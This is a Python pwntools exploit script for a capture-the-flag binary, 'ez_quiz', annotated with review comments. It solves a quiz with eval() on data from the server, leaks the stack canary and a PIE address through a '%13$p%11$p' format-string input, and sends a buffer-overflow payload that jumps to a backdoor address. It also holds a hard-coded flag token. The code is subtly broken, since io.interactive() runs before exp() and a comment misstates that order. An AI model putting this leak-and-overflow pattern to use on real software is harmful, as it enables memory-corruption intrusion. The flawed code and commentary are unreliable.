from pwn import *
from pwn import p8,p16,p32,p64,u32,u64

# Target architecture and the terminal pwntools spawns for gdb.attach().
context.update(arch='amd64', terminal=['gnome-terminal', '-e'])

# Local copy of the challenge binary and the libc it is linked against.
# NOTE(review): this is a machine-specific path; it must exist for ELF()
# to load, so the script does not run elsewhere without editing it.
local_file = '/home/feichai/ctf_file/ez_quiz'
elf = ELF(local_file)
local_libc = elf.libc.path
libc = ELF(local_libc, checksec=False)
def start():
    """Open the target connection selected by pwntools' command-line args.

    ``GDB`` launches the local binary and attaches a debugger with a
    breakpoint at the hard-coded PIE-relative offset, ``PROCESS`` runs it
    plainly, and with neither flag a socket to the remote challenge host is
    opened. Returns the pwntools tube in every case.
    """
    gdbscript = '''
    b *$rebase(0x1E71)
    '''
    if args.GDB:
        target = process(local_file)
        gdb.attach(target, gdbscript)
        return target
    if args.PROCESS:
        return process(local_file)
    return remote("challenge.qsnctf.com", 30162)
def lg(s, addr):
    """Log *addr* as a bold-yellow ``<s>-->0x<hex>`` line via pwntools ``info``.

    Returns whatever ``info`` returns (``None`` in pwntools).
    """
    yellow = '\033[1;33m'
    reset = '\033[0m'
    return info(f'{yellow}{s}-->0x{addr:02x}{reset}')
# Short aliases over the module-level tube ``io`` (assigned below by start()).
# Each one resolves ``io`` at call time, so they must not be used before it exists.

def r(a):
    """Receive *a* bytes from ``io``."""
    return io.recv(a)


def ru(a):
    """Receive up to and including *a*; the delimiter itself is dropped."""
    return io.recvuntil(a, drop=True)


def s(a):
    """Send *a* without a trailing newline."""
    return io.send(a)


def sa(a, b):
    """Wait for *a*, then send *b*."""
    return io.sendafter(a, b)


def sl(a):
    """Send *a* followed by a newline."""
    return io.sendline(a)


def sla(a, b):
    """Wait for *a*, then send *b* followed by a newline."""
    return io.sendlineafter(a, b)
# Module-level tube used by the r/ru/s/sa/sl/sla helpers and by exp().
# Created at import time, so merely importing this file opens a process or
# a socket (depending on args.GDB / args.PROCESS).
io = start()
def exp():
    """Run the challenge session end to end on the module-level tube ``io``.

    Stages, in order: send the token, answer the arithmetic quiz, read the
    two values the ``gift`` prompt echoes back for a ``%N$p`` input, then
    send the final line. The echo of ``%13$p%11$p`` is what discloses the
    canary and a PIE address; a format call that takes the user string as a
    format argument rather than as the format itself would close that leak.
    """
    sla("Please give me your token:", 'DRKCTF{P13@s3_1e@k_thE_addr_0f_7he_cAnARy_@nd_pie}')
    ru('Right!')

    # NOTE(review): eval() on bytes received from the remote side runs
    # arbitrary server-chosen code on this machine. A restricted arithmetic
    # evaluator (e.g. an ast walk over numbers and operators) would be the
    # safe replacement; left as-is because the quiz grammar is not known here.
    quiz = ru('=')
    ans = eval(quiz)
    sla('?', str(ans))

    # The prompt echoes two pointer-sized values back: 14 chars ("0x" + 12
    # hex digits) for the PIE address, 18 chars for the canary.
    sla('gift:\n', '%13$p%11$p')
    leak_pie = int(r(14), 16)
    canary = int(r(18), 16)
    lg('leak_pie', leak_pie)
    lg('canary', canary)

    # 0x2042 / 0x1426 are offsets specific to this binary build.
    pie_base = leak_pie - 0x2042
    backdoor = pie_base + 0x1426
    padding = b'a' * (0x30 - 8)
    # p64(1) fills the 8-byte slot between the canary and the return slot
    # (presumably the saved frame pointer; not confirmed from this file).
    pd = padding + p64(canary) + p64(1) + p64(backdoor)
    sl(pd)
# Hand the tube over to the terminal once exp() has finished. Note this runs
# at import time, after exp() only when the __main__ guard below fires first;
# otherwise it blocks on an untouched connection.
io.interactive()
# Script entry point. Because io = start() and io.interactive() above execute
# unconditionally at module level, this guard only gates exp() itself.
if __name__=='__main__': exp()